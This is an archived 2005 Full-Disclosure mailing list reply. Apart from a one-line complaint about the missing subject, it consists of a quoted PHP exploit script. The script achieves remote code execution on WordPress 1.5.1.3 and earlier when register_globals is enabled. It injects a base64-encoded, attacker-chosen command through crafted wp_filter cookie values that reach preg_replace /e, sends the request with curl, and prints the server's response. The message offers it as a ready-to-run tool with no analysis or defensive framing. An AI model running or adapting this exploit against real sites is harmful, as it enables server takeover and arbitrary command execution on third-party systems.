lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <42F8D632.4020909@digitalmunition.com>
Date: Tue, 09 Aug 2005 12:13:38 -0400
From: "KF (lists)" <kf_lists@...italmunition.com>
To: kartoffelguru@...h.com
Cc: exploits@...irt.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com
Subject: Re: (no subject)


Maybe next I can enjoy a subject line?
-KF


kartoffelguru@...h.com wrote:

>now enjoy as attachment...
>  
>
>------------------------------------------------------------------------
>
><?php
>    echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
>    echo "(C) Copyright 2005 Kartoffelguru\n\n";
>    echo "[!] info: requires register_globals turned on on target host\n\n";
>    if (!extension_loaded('curl')) {
>        die ("[-] you need the curl extension activated...\n");
>    }
>
>    function usage()
>    {
>        die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n");
>    }
>
>    $options = getopt("h:c:");
>    if (count($options) < 1 || !isset($options['h'])) {
>        usage();
>    }
>
>    $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
>    $cmd  = (is_array($options['c']) ? $options['c'][0]:$options['c']);
>
>    if (!preg_match("/^http:\/\//", $host, $dummy)) {
>        usage();
>    }
>
>    if (strlen(trim($cmd))==0) {
>        $cmd = 'phpinfo();';
>    }
>
>    $code = base64_encode($cmd);
>    $cnv = "";
>    for ($i=0;$i<strlen($code); $i++) {
>        $cnv.= "chr(".ord($code[$i]).").";
>    }
>    $cnv.="chr(32)";
>
>    $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');
>
>    $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
>    $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
>    $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
>    $cookie.=$str;
>    $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
>    $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
>    $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';
>
>    $ch = curl_init();
>    curl_setopt($ch, CURLOPT_URL, $host);
>    curl_setopt($ch, CURLOPT_POST, 0);
>    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
>    curl_setopt($ch, CURLOPT_HEADER, 0);
>    curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
>    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
>    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
>    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
>    echo "[+] now executing\n\n";
>
>    $r = curl_exec($ch);
>    curl_close($ch);
>
>    echo $r;
>
>?>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ